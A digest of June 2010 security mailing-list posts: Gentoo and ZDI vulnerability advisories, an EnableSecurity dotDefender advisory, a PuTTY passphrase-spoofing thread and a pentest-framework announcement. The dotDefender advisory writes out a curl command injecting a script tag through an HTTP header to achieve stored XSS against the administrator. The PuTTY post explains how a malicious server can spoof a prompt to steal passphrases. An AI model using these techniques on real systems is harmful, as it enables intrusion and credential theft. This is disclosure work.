Applicure dotDefender 4.0 administrative interface cross site scripting
Applicure dotDefender 4.0 administrative interface cross site scripting An advisory by EnableSecurity. ID: ES-20100601 Advisory URL: http://resources.enablesecurity.com/advisories/ES-20100601-dotdefender4.txt Affected Versions: version 4.0 Fixed versions: 4.01-3 (and later) Description: Applicure dotDefender is a Web Application Firewall that can be installed on Windows and Linux servers. >From their website (applicure.com): "dotDefender is the market-leading software Web Application Firewall (WAF). dotDefender boasts enterprise-class security, advanced integration capabilities, easy maintenance and low total cost of ownership (TCO). dotDefender is the perfect choice for protecting your website and web applications today. " Credits: These vulnerabilities were discovered during WAF testing by Sandro Gauci of EnableSecurity. We contacted AppliCure on May 17, 2010 about this vulnerability. They were already working on a fix. Technical details: The log viewer facility in dotDefender does not properly htmlencode user supplied input. This leads to a cross site scripting vulnerability when the log viewer displays HTTP headers. Demo: One may use curl and insert headers containing html tags using the --header switch. Example: curl "http:///c?a=" \ --header "<script>alert(1): aa" When the administrator views the log viewer page, his/her web browser will execute the attacker's javascript. The following demo shows how an attacker can switch off dotDefender in order to bypass any "protection" offered by the WAF: http://vimeo.com/12132622 Timeline: May 17, 2010: Initial contact Jun 01, 2010: Release of this advisory Solution: Upgrade to the latest version of dotDefender: http://www.applicure.com/ Contact: "Sandro Gauci" About EnableSecurity: EnableSecurity is dedicated to providing high quality Information Security Consultancy, Research and Development. EnableSecurity develops security tools such as VOIPPACK (for Immunity CANVAS) and SIPVicious. EnableSecurity is focused on analysis of security challenges and providing solutions to such threats. EnableSecurity works on developing custom targeted security solutions, as well as working with existing off the shelf security tools to provide the best results for their customers. More info at enablesecurity.com Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Re: RE: Nginx 0.8.35 Space Character Remote Source Disclosure
Vul in stable versions now isn't work. Original Advisory: http://blog.pouya.info/userfiles/vul/NginX.rar
[ GLSA 201006-09 ] sudo: Privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201006-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: sudo: Privilege escalation Date: June 01, 2010 Bugs: #321697 ID: 201006-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A flaw in sudo's -e option may allow local attackers to execute arbitrary commands. Background == sudo allows a system administrator to give users the ability to run commands as other users. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-admin/sudo < 1.7.2_p6 >= 1.7.2_p6 Description === The command matching functionality does not properly handle when a file in the current working directory has the same name as a pseudo-command in the sudoers file and the PATH contains an entry for ".". Impact == A local attacker with the permission to run sudoedit could, under certain circumstances, execute arbitrary commands as whichever user he has permission to run sudoedit as, typically root. Workaround == There is no known workaround at this time. Resolution == All sudo users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-admin/sudo-1.7.2_p6" References == [ 1 ] CVE-2010-1163 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201006-09.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[ GLSA 201006-08 ] nano: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201006-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: nano: Multiple vulnerabilities Date: June 01, 2010 Bugs: #315355 ID: 201006-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Race conditions when editing files could lead to symlink attacks or changes of ownerships of important files. Background == nano is a GNU GPL'd Pico clone with more functionality. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-editors/nano < 2.2.4 >= 2.2.4 Description === Multiple race condition vulnerabilities have been discovered in nano. For further information please consult the CVE entries referenced below. Impact == Under certain conditions, a local, user-assisted attacker could possibly overwrite arbitrary files via a symlink attack on an attacker-owned file that is being edited by the victim, or change the ownership of arbitrary files. Workaround == There is no known workaround at this time. Resolution == All nano users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-editors/nano-2.2.4" References == [ 1 ] CVE-2010-1160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1160 [ 2 ] CVE-2010-1161 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1161 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201006-08.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
ZDI-10-090: Novell ZENworks Configuration Management Preboot Service Remote Code Execution Vulnerability
ZDI-10-090: Novell ZENworks Configuration Management Preboot Service Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-090 June 1, 2010 -- Affected Vendors: Novell -- Affected Products: Novell Zenworks -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9755. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENworks. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Preboot Service (novell-pbserv.exe). This service listens for incoming connections on TCP port 998. The service uses a simple binary protocol where the first DWORD is an opcode followed by the specific opcode's data, typically in length/value pairs. These length values are not checked against the destination buffers size allowing for stack-based overflows to occur. This can lead to arbitrary code execution in the context of the SYSTEM user. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=7005572&sliceId=1&docTypeID=DT_TID_1_1&dialogID=138523325&stateId=0%200%20138517923 -- Disclosure Timeline: 2010-02-09 - Vulnerability reported to vendor 2010-06-01 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Stephen Fewer of Harmony Security (www.harmonysecurity.com) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
[ GLSA 201006-07 ] SILC: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201006-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: SILC: Multiple vulnerabilities Date: June 01, 2010 Bugs: #284561 ID: 201006-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities were discovered in SILC Toolkit and SILC Client, the worst of which allowing for execution of arbitrary code. Background == SILC (Secure Internet Live Conferencing protocol) Toolkit is a software development kit for use in clients, and SILC Client is an IRSSI-based text client. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-im/silc-toolkit < 1.1.10 >= 1.1.10 2 net-im/silc-client< 1.1.8>= 1.1.8 --- 2 affected packages on all of their supported architectures. --- Description === Multiple vulnerabilities were discovered in SILC Toolkit and SILC Client. For further information please consult the CVE entries referenced below. Impact == A remote attacker could overwrite stack locations and possibly execute arbitrary code via a crafted OID value, Content-Length header or format string specifiers in a nickname field or channel name. Workaround == There is no known workaround at this time. Resolution == All SILC Toolkit users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-im/silc-toolkit-1.1.10" All SILC Client users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-im/silc-client-1.1.8" References == [ 1 ] CVE-2008-7159 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7159 [ 2 ] CVE-2008-7160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7160 [ 3 ] CVE-2009-3051 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3051 [ 4 ] CVE-2009-3163 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3163 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201006-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[ GLSA 201006-06 ] Transmission: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201006-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Transmission: Multiple vulnerabilities Date: June 01, 2010 Bugs: #309831 ID: 201006-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Stack-based buffer overflows in Transmission may allow for remote execution of arbitrary code. Background == Transmission is a cross-platform BitTorrent client. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-p2p/transmission < 1.92 >= 1.92 Description === Multiple stack-based buffer overflows in the tr_magnetParse() function in libtransmission/magnet.c have been discovered. Impact == A remote attacker could cause a Denial of Service or possibly execute arbitrary code via a crafted magnet URL with a large number of tr or ws links. Workaround == There is no known workaround at this time. Resolution == All Transmission users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-p2p/transmission-1.92" References == [ 1 ] CVE-2010-1853 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1853 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201006-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[ GLSA 201006-05 ] Wireshark: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201006-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Wireshark: Multiple vulnerabilities Date: June 01, 2010 Bugs: #297388, #318935 ID: 201006-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities were found in Wireshark. Background == Wireshark is a versatile network protocol analyzer. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-analyzer/wireshark < 1.2.8-r1 >= 1.2.8-r1 Description === Multiple vulnerabilities were found in the Daintree SNA file parser, the SMB, SMB2, IPMI, and DOCSIS dissectors. For further information please consult the CVE entries referenced below. Impact == A remote attacker could cause a Denial of Service and possibly execute arbitrary code via crafted packets or malformed packet trace files. Workaround == There is no known workaround at this time. Resolution == All Wireshark users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.2.8-r1" References == [ 1 ] CVE-2009-4376 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4376 [ 2 ] CVE-2009-4377 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4377 [ 3 ] CVE-2009-4378 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4378 [ 4 ] CVE-2010-1455 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1455 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201006-05.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[ GLSA 201006-04 ] xine-lib: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201006-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: xine-lib: User-assisted execution of arbitrary code Date: June 01, 2010 Bugs: #234777, #249041, #260069, #265250 ID: 201006-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in xine-lib might result in the remote execution of arbitrary code. Background == xine-lib is the core library package for the xine media player, and other players such as Amarok, Codeine/Dragon Player and Kaffeine. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-libs/xine-lib < 1.1.16.3>= 1.1.16.3 Description === Multiple vulnerabilites have been reported in xine-lib. Please review the CVE identifiers referenced below for details. Impact == A remote attacker could entice a user to play a specially crafted video file or stream with a player using xine-lib, potentially resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All xine-lib users should upgrade to an unaffected version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/xine-lib-1.1.16.3" NOTE: This is a legacy GLSA. Updates for all affected architectures are available since April 10, 2009. It is likely that your system is already no longer affected by this issue. References == [ 1 ] CVE-2008-3231 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3231 [ 2 ] CVE-2008-5233 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5233 [ 3 ] CVE-2008-5234 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5234 [ 4 ] CVE-2008-5235 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5235 [ 5 ] CVE-2008-5236 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5236 [ 6 ] CVE-2008-5237 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5237 [ 7 ] CVE-2008-5238 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5238 [ 8 ] CVE-2008-5239 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5239 [ 9 ] CVE-2008-5240 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5240 [ 10 ] CVE-2008-5241 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5241 [ 11 ] CVE-2008-5242 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5242 [ 12 ] CVE-2008-5243 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5243 [ 13 ] CVE-2008-5244 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5244 [ 14 ] CVE-2008-5245 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5245 [ 15 ] CVE-2008-5246 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5246 [ 16 ] CVE-2008-5247 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5247 [ 17 ] CVE-2008-5248 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5248 [ 18 ] CVE-2009-0698 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0698 [ 19 ] CVE-2009-1274 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1274 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201006-04.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
Re: [Full-disclosure] PuTTY private key passphrase stealing attack
On Jun 1, 2010, at 2:47 AM, Jan Schejbal wrote: > PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in > the console window used for the connection. This could allow a malicious > server to gain access to a user's passphrase by spoofing that prompt. > > We assume that the user is using key-bases ssh auth with ssh and connects > using PuTTY. PuTTY now asks for the passphrase to the key. The user enters > the passphrase. If the passphrase is wrong, PuTTY will now request the > passphrase again after stating that it was wrong. If the passphrase is > correct, the connection to the server is established. This kind of attack is a real classic, the in-band problem inherent to any text terminal. Reading of the venerable and now forgotten classic by Wood and Kochan, "Unix System Security", published in 1985 should still be mandatory. Moreover, many of these in-band risks are applicable to window systems, which exhibit even worse properties. See the fuss with "tab-nabbing" now. Borja.
[ GLSA 201006-03 ] ImageMagick: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201006-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ImageMagick: User-assisted execution of arbitrary code Date: June 01, 2010 Bugs: #271502 ID: 201006-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An integer overflow in ImageMagick might allow remote attackers to cause the remote execution of arbitrary code. Background == ImageMagick is a collection of tools and libraries for manipulating various image formats. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 media-gfx/imagemagick < 6.5.2.9 >= 6.5.2.9 Description === Tielei Wang has discovered that the XMakeImage() function in magick/xwindow.c is prone to an integer overflow, possibly leading to a buffer overflow. Impact == A remote attacker could entice a user to open a specially crafted image, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All ImageMagick users should upgrade to an unaffected version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-gfx/imagemagick-6.5.2.9" NOTE: This is a legacy GLSA. Updates for all affected architectures are available since June 4, 2009. It is likely that your system is already no longer affected by this issue. References == [ 1 ] CVE-2009-1882 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1882 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201006-03.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
PuTTY private key passphrase stealing attack
PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in the console window used for the connection. This could allow a malicious server to gain access to a user's passphrase by spoofing that prompt. We assume that the user is using key-bases ssh auth with ssh and connects using PuTTY. PuTTY now asks for the passphrase to the key. The user enters the passphrase. If the passphrase is wrong, PuTTY will now request the passphrase again after stating that it was wrong. If the passphrase is correct, the connection to the server is established. A malicious/manipulated server could then display "Wrong passphrase" and ask for the passphrase again. If the user enters it again, it is sent to the malicious server. As far as I can see, there are only two ways how the user might detect it: 1. The real "Wrong passphrase" message is displayed without delay. After entering the correct passphrase, a small delay occurs. 2. The prompt contains the name of the key as stored on the client. Often the same name is used in the authorized_keys file on the server, giving it to the attacker. Maybe it is also possible for the server to remotely read the screen contents or duplicate it using some xterm control sequences, so users should not rely on it. (See also the attached screenshot, where you can see that there is no visible difference.) I assume that there are more similar issues like this one using different authentication modes etc. This can be exploited using a modified .bashrc file. This means that once an attacker has gained access to a user account on the server, he can try this to gain the passphrase to the key. Impact: Low. As a malicious server is required, the attack probability is not very high. Without the keyfile, the passphrase is worthless to the attacker unless it is used in multiple places. However, key-based auth is supposed to be secure even with untrusted/malicious servers. Developer notification: The possibility of such spoofing attacks is known: http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/gui-auth.html Workaround: Load the key into the Pageant agent before esablishing the connection Other software affected: Probably many console-based SSH tools have similar issues. <>
Onapsis Research Labs: Onapsis Bizploit - The opensource ERP Penetration Testing framework
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear colleague, We are proud to announce the release of Onapsis Bizploit, the first opensource ERP Penetration Testing framework. Presented at the renowned HITB Dubai security conference, Bizploit is expected to provide the security community with a basic framework to support the discovery, exploration, vulnerability assessment and exploitation of ERP systems. The term "ERP Security" has been so far understood by most of the IT Security and Auditing industries as a synonym of “Segregation of Duties”. While this aspect is absolutely important for the overall security of the Organization's core business platforms, there are many other threats that are still overlooked and imply much higher levels of risk. Onapsis Bizploit is designed as an academic proof-of-concept that will help the general community to illustrate and understand this kind of risks. Currently Onapsis Bizploit provides all the features available in the sapyto GPL project, plus several new plugins and connectors focused in the security of SAP business platforms. Updates for other popular ERPs are to be released in the short term. Your can download the software freely from http://www.onapsis.com Best regards, - The Onapsis Research Labs Team Onapsis S.R.L Email: resea...@onapsis.com Web: www.onapsis.com PGP: http://www.onapsis.com/pgp/research.asc - -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkwFGb0ACgkQz3i6WNVBcDVwIgCfZR0uxk7I6dyS1iDeCdT0+TUc 5cYAoLseOOYLowJqcrg2tBCgE7JojpNv =s+M+ -END PGP SIGNATURE-
[ GLSA 201006-02 ] CamlImages: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201006-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: CamlImages: User-assisted execution of arbitrary code Date: June 01, 2010 Bugs: #276235, #290222 ID: 201006-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple integer overflows in CamlImages might result in the remote execution of arbitrary code. Background == CamlImages is an image processing library for Objective Caml. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 dev-ml/camlimages < 3.0.2 >= 3.0.2 Description === Tielei Wang reported multiple integer overflows, possibly leading to heap-based buffer overflows in the (1) read_png_file() and read_png_file_as_rgb24() functions, when processing a PNG image (CVE-2009-2295) and (2) gifread.c and jpegread.c files when processing GIF or JPEG images (CVE-2009-2660). Other integer overflows were also found in tiffread.c (CVE-2009-3296). Impact == A remote attacker could entice a user to open a specially crafted, overly large PNG, GIF, TIFF, or JPEG image using an application that uses the CamlImages library, possibly resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All CamlImages users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-ml/camlimages-3.0.2 References == [ 1 ] CVE-2009-2295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2295 [ 2 ] CVE-2009-2660 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2660 [ 3 ] CVE-2009-3296 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3296 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201006-02.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
Re: [Full-disclosure] PuTTY private key passphrase stealing attack
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jan Schejbal wrote: > PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in the > console window used for the connection. This could allow a malicious server to > gain access to a user's passphrase by spoofing that prompt That seems to be the default for many ssh clients, you might want to look at http://lists.mindrot.org/pipermail/openssh-unix-dev/2008-May/026416.html for older discussion on that topic. Regards, a dog - -- http://www.halfdog.net/ PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkwEpzUACgkQxFmThv7tq+6r6gCfT5K7SDuOTtm5793QSQHhi3+2 CukAoIoihFMyqDSDMjB13GFGBkmT0548 =67Qu -END PGP SIGNATURE-
[ GLSA 201006-01 ] FreeType 1: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201006-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: FreeType 1: User-assisted execution of arbitrary code Date: June 01, 2010 Bugs: #271234 ID: 201006-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in FreeType might result in the remote execution of arbitrary code. Background == FreeType is a True Type Font rendering library. Affected packages = --- Package / Vulnerable / Unaffected --- 1 freetype < 1.4_pre20080316-r2 >= 1.4_pre20080316-r2 Description === Multiple issues found in FreeType 2 were also discovered in FreeType 1. For details on these issues, please review the Gentoo Linux Security Advisories and CVE identifiers referenced below. Impact == A remote attacker could entice a user to open a specially crafted TTF file, possibly resulting in the execution of arbitrary code with the privileges of the user running FreeType. Workaround == There is no known workaround at this time. Resolution == All FreeType 1 users should upgrade to an unaffected version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/freetype-1.4_pre20080316-r2" NOTE: This is a legacy GLSA. Updates for all affected architectures are available since May 27, 2009. It is likely that your system is already no longer affected by this issue. References == [ 1 ] CVE-2006-1861 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1861 [ 2 ] CVE-2007-2754 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2754 [ 3 ] GLSA 200607-02 http://www.gentoo.org/security/en/glsa/glsa-200607-02.xml [ 4 ] GLSA 200705-22 http://www.gentoo.org/security/en/glsa/glsa-200705-22.xml Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201006-01.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
Re: [Full-disclosure] PuTTY private key passphrase stealing attack
